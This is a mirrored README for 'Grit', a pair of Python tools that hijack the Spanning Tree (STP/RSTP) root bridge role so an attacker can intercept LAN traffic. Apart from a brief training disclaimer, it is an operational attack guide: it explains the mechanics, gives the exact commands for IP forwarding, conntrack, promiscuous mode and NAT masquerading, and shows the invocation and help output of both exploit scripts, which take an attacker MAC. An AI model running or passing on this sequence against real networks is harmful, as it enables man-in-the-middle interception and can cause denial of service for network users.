Code Monkey home page Code Monkey logo

grit's Introduction

Grit

STP & RSTP Root Hijacking Exploits

The author has nothing to do with those who will use these tools for personal purposes to destroy other people's computer networks. The tools are presented for training purposes to help engineers improve the security of their network.

1. Mechanics of the attack.

The basic principle of the tools is to generate an STP/RSTP frame with the lowest priority value. Which in turn allows you to intercept the role of the root switch. After that, an opportunity will open for a MITM attack, you will partially intercept traffic, not all of it. Keep that in mind. But don't forget that the BPDU GUARD system can stop you.

Before performing the injection, you should first analyze what type of STP protocol is used. And based on this, to start further... By the way, nothing prevents an attack against the classic STP using an exploit for RSTP. If a MITM attack fails, feel free to experiment and try two versions of exploits at once (STP exploit for RSTP, RSTP exploit for STP) Also, after injection, switch will generate TCN messages (Topology Change Notification)

If there are any problems, write to "Issues"

2. Limitations

Depending on the power of your hardware. some host traffic will go through you, you have to withstand this load, otherwise DoS will occur.

3. Attack

First you need to install the dependencies.

sudo pip3 install -r requirements.txt

3.1 Enable Forwarding

sudo sysctl -w net.ipv4.ip_forward=1

3.2 Enable Conntrack (nf_conntrack_helper)

sudo modprobe nf_conntrack
sudo echo "1" > /proc/sys/net/netfilter/nf_conntrack_helper

3.3 Promisc mode on interface

sudo ip link set ethX promisc on

3.4 NAT

sudo iptables -t nat -A POSTROUTING -o ethX -j MASQUERADE

3.5 Start of injection.

3.5.1 STP

sudo python3 stpexploit.py --interface ethX --mac XX:XX:XX:XX:XX:XX 

3.5.2 RSTP

sudo python3 rstpexploit.py --interface ethX --mac XX:XX:XX:XX:XX:XX

After executing the injection, you will intercept the role of the root switch. you can track generated STP ads in Wireshark or tcpdump :)

4. Help

python3 stpexploit.py  --help     

  ▄████  ██▀███   ██▓▄▄▄█████▓
 ██▒ ▀█▒▓██ ▒ ██▒▓██▒▓  ██▒ ▓▒
▒██░▄▄▄░▓██ ░▄█ ▒▒██▒▒ ▓██░ ▒░
░▓█  ██▓▒██▀▀█▄  ░██░░ ▓██▓ ░ 
░▒▓███▀▒░██▓ ▒██▒░██░  ▒██▒ ░ 
 ░▒   ▒ ░ ▒▓ ░▒▓░░▓    ▒ ░░   
  ░   ░   ░▒ ░ ▒░ ▒ ░    ░    
░ ░   ░   ░░   ░  ▒ ░  ░      
      ░    ░      ░          

STP Root Hijacking Exploit
For the classic version of Spanning Tree Protocol

Author: Caster, @c4s73r, <[email protected]>

usage: stpexploit.py [-h] --interface INTERFACE --mac EVILMAC

options:
  -h, --help            show this help message and exit
  --interface INTERFACE
                        Choose the interface to attack
  --mac EVILMAC         Specify your MAC
python3 rstpexploit.py --help                                                                                                                          

  ▄████  ██▀███   ██▓▄▄▄█████▓
 ██▒ ▀█▒▓██ ▒ ██▒▓██▒▓  ██▒ ▓▒
▒██░▄▄▄░▓██ ░▄█ ▒▒██▒▒ ▓██░ ▒░
░▓█  ██▓▒██▀▀█▄  ░██░░ ▓██▓ ░ 
░▒▓███▀▒░██▓ ▒██▒░██░  ▒██▒ ░ 
 ░▒   ▒ ░ ▒▓ ░▒▓░░▓    ▒ ░░   
  ░   ░   ░▒ ░ ▒░ ▒ ░    ░    
░ ░   ░   ░░   ░  ▒ ░  ░      
      ░    ░      ░          

RSTP Root Hijacking Exploit
For Rapid Spanning Tree Protocol version

Author: Caster, @c4s73r, <[email protected]>

usage: rstpexploit.py [-h] --interface INTERFACE --mac EVILMAC

options:
  -h, --help            show this help message and exit
  --interface INTERFACE
  --mac EVILMAC

grit's People

Contributors

bykvaadm avatar casterbyte avatar

Stargazers

 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.